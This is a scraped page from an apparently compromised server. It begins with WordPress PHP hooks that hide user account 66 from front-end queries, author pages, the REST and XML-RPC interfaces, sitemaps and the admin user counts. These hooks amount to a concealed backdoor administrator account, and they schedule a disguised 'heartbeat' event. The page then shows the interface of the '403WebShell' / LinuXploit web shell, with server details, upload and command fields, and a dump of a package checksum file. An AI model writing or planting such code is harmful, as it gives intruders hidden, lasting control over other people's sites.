add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/php8.3-common.md5sums
9c9e323ab5227e3063f69c855f4505e4  usr/lib/php/20230831/calendar.so
e506b9e8f5eb2cfff63bc10454880606  usr/lib/php/20230831/ctype.so
81344593acaa7ed5b03783f9c145a3a2  usr/lib/php/20230831/exif.so
49f64f9d4bcddceb3a121df0e5b7aefa  usr/lib/php/20230831/ffi.so
61e814fb114767031b7400a0fca8fc9a  usr/lib/php/20230831/fileinfo.so
e3ac6dc5beeda674b2e307ee7c2f9b1b  usr/lib/php/20230831/ftp.so
04545bca53d783e5100e96f1bd507909  usr/lib/php/20230831/gettext.so
6cc618d1a7e4bf0cfa4f96c888b4520c  usr/lib/php/20230831/iconv.so
fc737db16d96257e1d1acaca7f8f4520  usr/lib/php/20230831/pdo.so
bd208de77842c5917b9dfc56cddca488  usr/lib/php/20230831/phar.so
f28a4116bcdc480044678a16a52d35eb  usr/lib/php/20230831/posix.so
2aa73cfb1e5bca634a72eb2dae56c55a  usr/lib/php/20230831/shmop.so
af95dec5e78f2a9d168411c5a39c1c06  usr/lib/php/20230831/sockets.so
ca9558cddf102801e571eaa1b11cc5e6  usr/lib/php/20230831/sysvmsg.so
fcae4f50187dee555eb0ffbeacd7827c  usr/lib/php/20230831/sysvsem.so
c74dfd0fa810d9f64a1a33d653b5a9c8  usr/lib/php/20230831/sysvshm.so
b28952ff4751346be10b7177b5e29c67  usr/lib/php/20230831/tokenizer.so
7dff5fc3e6e1035f907abc6749fd92bf  usr/lib/php/8.3/php.ini-development
75451050d77c02f5b29da8360395a9dd  usr/lib/php/8.3/php.ini-production
726c33e11795235b71f7367d79eb8744  usr/lib/php/8.3/php.ini-production.cli
df11103a63de394d6a375b1a02e8d0df  usr/share/bug/php8.3-common/control
dfef637ba95361a8691bd447c6222669  usr/share/bug/php8.3-common/script
478627a792e8d735f5c4990d5d8a2668  usr/share/doc/php8.3-common/EXTENSIONS.gz
1fca9b3dadd87f6478449b9b1e8892e1  usr/share/doc/php8.3-common/NEWS.Debian.gz
00f7bb2f4f207c100e9c2e66c041fd9d  usr/share/doc/php8.3-common/README.Debian.gz
ce1877f2af8041f649289e662ea0e7b9  usr/share/doc/php8.3-common/README.Debian.security
d420cd68c045d8bfe933411d33abf1ae  usr/share/doc/php8.3-common/README.md.gz
7248b14cd1710a1e108b532f1cd4c3ea  usr/share/doc/php8.3-common/UPGRADING.INTERNALS.gz
06514a340f5fcc3af2bfae89c0b019c8  usr/share/doc/php8.3-common/UPGRADING.gz
e2167dc178334fae89fd99347a43072c  usr/share/doc/php8.3-common/changelog.Debian.gz
1a2b71878e1fc203e9cc4ec530c8781b  usr/share/doc/php8.3-common/changelog.gz
2600cbcf2de9f3c298485a6ac1972048  usr/share/doc/php8.3-common/copyright
a3c1d02900e1b02ebc5f31eacb2eb8c5  usr/share/lintian/overrides/php8.3-common
0877786daf8479dd91be0f89f223a102  usr/share/php8.3-common/common/calendar.ini
72def1d4663c5350713006af725f21ae  usr/share/php8.3-common/common/ctype.ini
7b3bf6064e6bd1749e5f1a3dd56592b3  usr/share/php8.3-common/common/exif.ini
40c77aebbb04a3e8891ea3575eda55a5  usr/share/php8.3-common/common/ffi.ini
3eb68bf4e22faed68c673430081b1a08  usr/share/php8.3-common/common/fileinfo.ini
b245857286d2cff077355dd82086c950  usr/share/php8.3-common/common/ftp.ini
7dfbed71c04bbd15100e719b20b7c764  usr/share/php8.3-common/common/gettext.ini
f875ac0ca30dea610b2adc421b9e997e  usr/share/php8.3-common/common/iconv.ini
2bcf2cd02149a7b3118f9a8ed7cfe1b3  usr/share/php8.3-common/common/pdo.ini
9dafa1a822dd003107e1686818a191fd  usr/share/php8.3-common/common/phar.ini
0f55f144c06b074b7c0a498928001452  usr/share/php8.3-common/common/posix.ini
894f4d6c5c36f658499b941a02bbc9a7  usr/share/php8.3-common/common/shmop.ini
5c9f4598aa9e02021783e540fc023c66  usr/share/php8.3-common/common/sockets.ini
0ac70c35787ea579baefc56e36ea9c47  usr/share/php8.3-common/common/sysvmsg.ini
a4c2616a57351dc93cb36e1f41c63926  usr/share/php8.3-common/common/sysvsem.ini
46bf0b73759bfdd7fcf431ea42d03c2f  usr/share/php8.3-common/common/sysvshm.ini
cb36a25e9c9d2c975cb49bbb56f16465  usr/share/php8.3-common/common/tokenizer.ini

Youez - 2016 - github.com/yon3zu
LinuXploit